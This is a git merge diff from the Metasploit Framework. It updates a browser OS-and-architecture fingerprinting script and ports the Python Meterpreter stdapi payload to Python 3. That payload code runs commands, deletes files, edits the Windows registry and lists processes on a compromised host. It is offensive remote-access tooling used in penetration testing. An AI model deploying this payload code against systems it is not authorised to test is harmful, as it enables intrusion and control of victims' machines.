Merge branch 'staging/electro-release' into feature/MSP-9653/use-metasploit-concern-in-pro
MSP-9653 Conflicts: Gemfile Gemfile.lockbug/bundler_fix
commit
f2a56c041b
|
@ -50,7 +50,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
|
||||||
#### New Modules
|
#### New Modules
|
||||||
|
|
||||||
* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
|
* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
|
||||||
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
|
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
|
||||||
* **Don't** include more than one module per pull request.
|
* **Don't** include more than one module per pull request.
|
||||||
|
|
||||||
#### Library Code
|
#### Library Code
|
||||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Before Width: | Height: | Size: 3.0 KiB |
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -20,6 +20,7 @@ arch_armle = "armle";
|
||||||
arch_x86 = "x86";
|
arch_x86 = "x86";
|
||||||
arch_x86_64 = "x86_64";
|
arch_x86_64 = "x86_64";
|
||||||
arch_ppc = "ppc";
|
arch_ppc = "ppc";
|
||||||
|
arch_mipsle = "mipsle";
|
||||||
|
|
||||||
window.os_detect = {};
|
window.os_detect = {};
|
||||||
|
|
||||||
|
@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
|
||||||
} else if (platform.match(/arm/)) {
|
} else if (platform.match(/arm/)) {
|
||||||
// Android and maemo
|
// Android and maemo
|
||||||
arch = arch_armle;
|
arch = arch_armle;
|
||||||
if (navigator.userAgent.match(/android/i)) {
|
} else if (platform.match(/x86/)) {
|
||||||
os_flavor = 'Android';
|
arch = arch_x86;
|
||||||
}
|
} else if (platform.match(/mips/)) {
|
||||||
|
arch = arch_mipsle;
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if (navigator.userAgent.match(/android/i)) {
|
||||||
|
os_flavor = 'Android';
|
||||||
}
|
}
|
||||||
} else if (platform.match(/windows/)) {
|
} else if (platform.match(/windows/)) {
|
||||||
os_name = oses_windows;
|
os_name = oses_windows;
|
||||||
|
|
Binary file not shown.
|
@ -48,6 +48,24 @@ try:
|
||||||
except ImportError:
|
except ImportError:
|
||||||
has_winreg = False
|
has_winreg = False
|
||||||
|
|
||||||
|
try:
|
||||||
|
import winreg
|
||||||
|
has_winreg = True
|
||||||
|
except ImportError:
|
||||||
|
has_winreg = (has_winreg or False)
|
||||||
|
|
||||||
|
if sys.version_info[0] < 3:
|
||||||
|
is_str = lambda obj: issubclass(obj.__class__, str)
|
||||||
|
is_bytes = lambda obj: issubclass(obj.__class__, str)
|
||||||
|
bytes = lambda *args: str(*args[:1])
|
||||||
|
NULL_BYTE = '\x00'
|
||||||
|
else:
|
||||||
|
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
|
||||||
|
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
|
||||||
|
str = lambda x: __builtins__['str'](x, 'UTF-8')
|
||||||
|
NULL_BYTE = bytes('\x00', 'UTF-8')
|
||||||
|
long = int
|
||||||
|
|
||||||
if has_ctypes:
|
if has_ctypes:
|
||||||
#
|
#
|
||||||
# Windows Structures
|
# Windows Structures
|
||||||
|
@ -498,11 +516,12 @@ def get_stat_buffer(path):
|
||||||
blocks = si.st_blocks
|
blocks = si.st_blocks
|
||||||
st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
|
st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
|
||||||
st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
|
st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
|
||||||
st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
|
st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
|
||||||
st_buf += struct.pack('<II', blksize, blocks)
|
st_buf += struct.pack('<II', blksize, blocks)
|
||||||
return st_buf
|
return st_buf
|
||||||
|
|
||||||
def netlink_request(req_type):
|
def netlink_request(req_type):
|
||||||
|
import select
|
||||||
# See RFC 3549
|
# See RFC 3549
|
||||||
NLM_F_REQUEST = 0x0001
|
NLM_F_REQUEST = 0x0001
|
||||||
NLM_F_ROOT = 0x0100
|
NLM_F_ROOT = 0x0100
|
||||||
|
@ -513,17 +532,25 @@ def netlink_request(req_type):
|
||||||
sock.bind((os.getpid(), 0))
|
sock.bind((os.getpid(), 0))
|
||||||
seq = int(time.time())
|
seq = int(time.time())
|
||||||
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
|
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
|
||||||
sfd = os.fdopen(sock.fileno(), 'w+b')
|
sock.send(nlmsg)
|
||||||
sfd.write(nlmsg)
|
|
||||||
responses = []
|
responses = []
|
||||||
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
|
||||||
|
return responses
|
||||||
|
raw_response_data = sock.recv(0xfffff)
|
||||||
|
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
|
||||||
|
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
|
||||||
while response.type != NLMSG_DONE:
|
while response.type != NLMSG_DONE:
|
||||||
if response.type == NLMSG_ERROR:
|
if response.type == NLMSG_ERROR:
|
||||||
break
|
break
|
||||||
response_data = sfd.read(response.len - 16)
|
response_data = raw_response_data[:(response.len - 16)]
|
||||||
responses.append(response_data)
|
responses.append(response_data)
|
||||||
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
|
raw_response_data = raw_response_data[len(response_data):]
|
||||||
sfd.close()
|
if not len(raw_response_data):
|
||||||
|
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
|
||||||
|
break
|
||||||
|
raw_response_data = sock.recv(0xfffff)
|
||||||
|
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
|
||||||
|
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
|
||||||
sock.close()
|
sock.close()
|
||||||
return responses
|
return responses
|
||||||
|
|
||||||
|
@ -559,7 +586,7 @@ def channel_open_stdapi_fs_file(request, response):
|
||||||
else:
|
else:
|
||||||
fmode = 'rb'
|
fmode = 'rb'
|
||||||
file_h = open(fpath, fmode)
|
file_h = open(fpath, fmode)
|
||||||
channel_id = meterpreter.add_channel(file_h)
|
channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
|
||||||
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
|
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
|
@ -675,6 +702,7 @@ def stdapi_sys_process_execute(request, response):
|
||||||
proc_h.stderr = open(os.devnull, 'rb')
|
proc_h.stderr = open(os.devnull, 'rb')
|
||||||
else:
|
else:
|
||||||
proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||||
|
proc_h.echo_protection = True
|
||||||
proc_h.start()
|
proc_h.start()
|
||||||
else:
|
else:
|
||||||
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||||
|
@ -693,15 +721,15 @@ def stdapi_sys_process_getpid(request, response):
|
||||||
|
|
||||||
def stdapi_sys_process_get_processes_via_proc(request, response):
|
def stdapi_sys_process_get_processes_via_proc(request, response):
|
||||||
for pid in os.listdir('/proc'):
|
for pid in os.listdir('/proc'):
|
||||||
pgroup = ''
|
pgroup = bytes()
|
||||||
if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
|
if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
|
||||||
continue
|
continue
|
||||||
cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
|
cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
|
||||||
status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
|
cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
|
||||||
|
status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
|
||||||
status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
|
status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
|
||||||
status_data = filter(lambda x: len(x) == 2, status_data)
|
|
||||||
status = {}
|
status = {}
|
||||||
for k, v in status_data:
|
for k, v in filter(lambda x: len(x) == 2, status_data):
|
||||||
status[k[:-1]] = v.strip()
|
status[k[:-1]] = v.strip()
|
||||||
ppid = status.get('PPid')
|
ppid = status.get('PPid')
|
||||||
uid = status.get('Uid').split('\t', 1)[0]
|
uid = status.get('Uid').split('\t', 1)[0]
|
||||||
|
@ -725,14 +753,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
|
||||||
def stdapi_sys_process_get_processes_via_ps(request, response):
|
def stdapi_sys_process_get_processes_via_ps(request, response):
|
||||||
ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
|
ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
|
||||||
proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
|
||||||
ps_output = proc_h.stdout.read()
|
ps_output = str(proc_h.stdout.read())
|
||||||
ps_output = ps_output.split('\n')
|
ps_output = ps_output.split('\n')
|
||||||
ps_output.pop(0)
|
ps_output.pop(0)
|
||||||
for process in ps_output:
|
for process in ps_output:
|
||||||
process = process.split()
|
process = process.split()
|
||||||
if len(process) < 4:
|
if len(process) < 4:
|
||||||
break
|
break
|
||||||
pgroup = ''
|
pgroup = bytes()
|
||||||
pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
|
pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
|
||||||
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
|
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
|
||||||
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
|
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
|
||||||
|
@ -793,7 +821,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
|
||||||
use = ctypes.c_ulong()
|
use = ctypes.c_ulong()
|
||||||
use.value = 0
|
use.value = 0
|
||||||
ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
|
ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
|
||||||
complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
|
complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
|
||||||
k32.CloseHandle(tkn_h)
|
k32.CloseHandle(tkn_h)
|
||||||
parch = windll_GetNativeSystemInfo()
|
parch = windll_GetNativeSystemInfo()
|
||||||
is_wow64 = ctypes.c_ubyte()
|
is_wow64 = ctypes.c_ubyte()
|
||||||
|
@ -802,7 +830,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
|
||||||
if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
|
if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
|
||||||
if is_wow64.value:
|
if is_wow64.value:
|
||||||
parch = PROCESS_ARCH_X86
|
parch = PROCESS_ARCH_X86
|
||||||
pgroup = ''
|
pgroup = bytes()
|
||||||
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
|
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
|
||||||
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
|
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
|
||||||
pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
|
pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
|
||||||
|
@ -850,16 +878,18 @@ def stdapi_fs_delete_dir(request, response):
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_fs_delete_file(request, response):
|
def stdapi_fs_delete_file(request, response):
|
||||||
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||||
os.unlink(file_path)
|
if os.path.exists(file_path):
|
||||||
|
os.unlink(file_path)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_fs_file_expand_path(request, response):
|
def stdapi_fs_file_expand_path(request, response):
|
||||||
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
|
||||||
if has_windll:
|
if has_windll:
|
||||||
|
path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
|
||||||
path_out = (ctypes.c_char * 4096)()
|
path_out = (ctypes.c_char * 4096)()
|
||||||
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
|
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
|
||||||
result = ''.join(path_out)[:path_out_len]
|
result = str(ctypes.string_at(path_out))
|
||||||
elif path_tlv == '%COMSPEC%':
|
elif path_tlv == '%COMSPEC%':
|
||||||
result = '/bin/sh'
|
result = '/bin/sh'
|
||||||
elif path_tlv in ['%TEMP%', '%TMP%']:
|
elif path_tlv in ['%TEMP%', '%TMP%']:
|
||||||
|
@ -912,7 +942,8 @@ def stdapi_fs_md5(request, response):
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_fs_mkdir(request, response):
|
def stdapi_fs_mkdir(request, response):
|
||||||
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
|
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
|
||||||
os.mkdir(dir_path)
|
if not os.path.isdir(dir_path):
|
||||||
|
os.mkdir(dir_path)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
|
@ -965,7 +996,7 @@ def stdapi_fs_stat(request, response):
|
||||||
|
|
||||||
@meterpreter.register_function
|
@meterpreter.register_function
|
||||||
def stdapi_net_config_get_interfaces(request, response):
|
def stdapi_net_config_get_interfaces(request, response):
|
||||||
if hasattr(socket, 'AF_NETLINK'):
|
if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
|
||||||
interfaces = stdapi_net_config_get_interfaces_via_netlink()
|
interfaces = stdapi_net_config_get_interfaces_via_netlink()
|
||||||
elif has_osxsc:
|
elif has_osxsc:
|
||||||
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
|
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
|
||||||
|
@ -974,7 +1005,7 @@ def stdapi_net_config_get_interfaces(request, response):
|
||||||
else:
|
else:
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
for iface_info in interfaces:
|
for iface_info in interfaces:
|
||||||
iface_tlv = ''
|
iface_tlv = bytes()
|
||||||
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
|
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
|
||||||
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
|
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
|
||||||
if 'mtu' in iface_info:
|
if 'mtu' in iface_info:
|
||||||
|
@ -1002,7 +1033,7 @@ def stdapi_net_config_get_interfaces_via_netlink():
|
||||||
0x0100: 'PROMISC',
|
0x0100: 'PROMISC',
|
||||||
0x1000: 'MULTICAST'
|
0x1000: 'MULTICAST'
|
||||||
}
|
}
|
||||||
iface_flags_sorted = iface_flags.keys()
|
iface_flags_sorted = list(iface_flags.keys())
|
||||||
# Dictionaries don't maintain order
|
# Dictionaries don't maintain order
|
||||||
iface_flags_sorted.sort()
|
iface_flags_sorted.sort()
|
||||||
interfaces = {}
|
interfaces = {}
|
||||||
|
@ -1106,7 +1137,7 @@ def stdapi_net_config_get_interfaces_via_osxsc():
|
||||||
hw_addr = hw_addr.replace(':', '')
|
hw_addr = hw_addr.replace(':', '')
|
||||||
hw_addr = hw_addr.decode('hex')
|
hw_addr = hw_addr.decode('hex')
|
||||||
iface_info['hw_addr'] = hw_addr
|
iface_info['hw_addr'] = hw_addr
|
||||||
ifnames = interfaces.keys()
|
ifnames = list(interfaces.keys())
|
||||||
ifnames.sort()
|
ifnames.sort()
|
||||||
for iface_name, iface_info in interfaces.items():
|
for iface_name, iface_info in interfaces.items():
|
||||||
iface_info['index'] = ifnames.index(iface_name)
|
iface_info['index'] = ifnames.index(iface_name)
|
||||||
|
@ -1138,7 +1169,10 @@ def stdapi_net_config_get_interfaces_via_windll():
|
||||||
iface_info['index'] = AdapterAddresses.u.s.IfIndex
|
iface_info['index'] = AdapterAddresses.u.s.IfIndex
|
||||||
if AdapterAddresses.PhysicalAddressLength:
|
if AdapterAddresses.PhysicalAddressLength:
|
||||||
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
|
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
|
||||||
iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
|
iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
|
||||||
|
if not is_str(iface_desc):
|
||||||
|
iface_desc = str(iface_desc)
|
||||||
|
iface_info['name'] = iface_desc
|
||||||
iface_info['mtu'] = AdapterAddresses.Mtu
|
iface_info['mtu'] = AdapterAddresses.Mtu
|
||||||
pUniAddr = AdapterAddresses.FirstUnicastAddress
|
pUniAddr = AdapterAddresses.FirstUnicastAddress
|
||||||
while pUniAddr:
|
while pUniAddr:
|
||||||
|
@ -1174,7 +1208,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
|
||||||
table_data = ctypes.string_at(table, pdwSize.value)
|
table_data = ctypes.string_at(table, pdwSize.value)
|
||||||
entries = struct.unpack('I', table_data[:4])[0]
|
entries = struct.unpack('I', table_data[:4])[0]
|
||||||
table_data = table_data[4:]
|
table_data = table_data[4:]
|
||||||
for i in xrange(entries):
|
for i in range(entries):
|
||||||
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
|
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
|
||||||
ifrow = MIB_IFROW()
|
ifrow = MIB_IFROW()
|
||||||
ifrow.dwIndex = addrrow.dwIndex
|
ifrow.dwIndex = addrrow.dwIndex
|
||||||
|
@ -1244,9 +1278,10 @@ def stdapi_registry_close_key(request, response):
|
||||||
def stdapi_registry_create_key(request, response):
|
def stdapi_registry_create_key(request, response):
|
||||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||||
|
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||||
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
||||||
res_key = ctypes.c_void_p()
|
res_key = ctypes.c_void_p()
|
||||||
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
|
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
|
||||||
response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
|
response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
|
@ -1255,18 +1290,20 @@ def stdapi_registry_create_key(request, response):
|
||||||
def stdapi_registry_delete_key(request, response):
|
def stdapi_registry_delete_key(request, response):
|
||||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||||
|
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||||
flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
|
flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
|
||||||
if (flags & DELETE_KEY_FLAG_RECURSIVE):
|
if (flags & DELETE_KEY_FLAG_RECURSIVE):
|
||||||
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
|
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
|
||||||
else:
|
else:
|
||||||
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
|
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
|
||||||
return result, response
|
return result, response
|
||||||
|
|
||||||
@meterpreter.register_function_windll
|
@meterpreter.register_function_windll
|
||||||
def stdapi_registry_delete_value(request, response):
|
def stdapi_registry_delete_value(request, response):
|
||||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||||
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
|
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||||
|
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
|
||||||
return result, response
|
return result, response
|
||||||
|
|
||||||
@meterpreter.register_function_windll
|
@meterpreter.register_function_windll
|
||||||
|
@ -1335,9 +1372,10 @@ def stdapi_registry_load_key(request, response):
|
||||||
def stdapi_registry_open_key(request, response):
|
def stdapi_registry_open_key(request, response):
|
||||||
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
|
||||||
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
|
||||||
|
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
|
||||||
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
|
||||||
handle_id = ctypes.c_void_p()
|
handle_id = ctypes.c_void_p()
|
||||||
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
|
if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
|
||||||
response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
|
response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
|
||||||
return ERROR_SUCCESS, response
|
return ERROR_SUCCESS, response
|
||||||
return ERROR_FAILURE, response
|
return ERROR_FAILURE, response
|
||||||
|
@ -1367,24 +1405,26 @@ def stdapi_registry_query_class(request, response):
|
||||||
|
|
||||||
@meterpreter.register_function_windll
|
@meterpreter.register_function_windll
|
||||||
def stdapi_registry_query_value(request, response):
|
def stdapi_registry_query_value(request, response):
|
||||||
REG_SZ = 1
|
|
||||||
REG_DWORD = 4
|
|
||||||
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
||||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||||
|
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||||
value_type = ctypes.c_uint32()
|
value_type = ctypes.c_uint32()
|
||||||
value_type.value = 0
|
value_type.value = 0
|
||||||
value_data = (ctypes.c_ubyte * 4096)()
|
value_data = (ctypes.c_ubyte * 4096)()
|
||||||
value_data_sz = ctypes.c_uint32()
|
value_data_sz = ctypes.c_uint32()
|
||||||
value_data_sz.value = ctypes.sizeof(value_data)
|
value_data_sz.value = ctypes.sizeof(value_data)
|
||||||
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
|
result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz))
|
||||||
if result == ERROR_SUCCESS:
|
if result == ERROR_SUCCESS:
|
||||||
response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
|
response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value)
|
||||||
if value_type.value == REG_SZ:
|
if value_type.value == winreg.REG_SZ:
|
||||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
|
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE)
|
||||||
elif value_type.value == REG_DWORD:
|
elif value_type.value == winreg.REG_DWORD:
|
||||||
value = value_data[:4]
|
value = value_data[:4]
|
||||||
value.reverse()
|
value.reverse()
|
||||||
value = ''.join(map(chr, value))
|
if sys.version_info[0] < 3:
|
||||||
|
value = ''.join(map(chr, value))
|
||||||
|
else:
|
||||||
|
value = bytes(value)
|
||||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
|
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
|
||||||
else:
|
else:
|
||||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
|
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
|
||||||
|
@ -1395,9 +1435,10 @@ def stdapi_registry_query_value(request, response):
|
||||||
def stdapi_registry_set_value(request, response):
|
def stdapi_registry_set_value(request, response):
|
||||||
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value']
|
||||||
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
|
||||||
|
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
|
||||||
value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
|
value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value']
|
||||||
value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
|
value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value']
|
||||||
result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data))
|
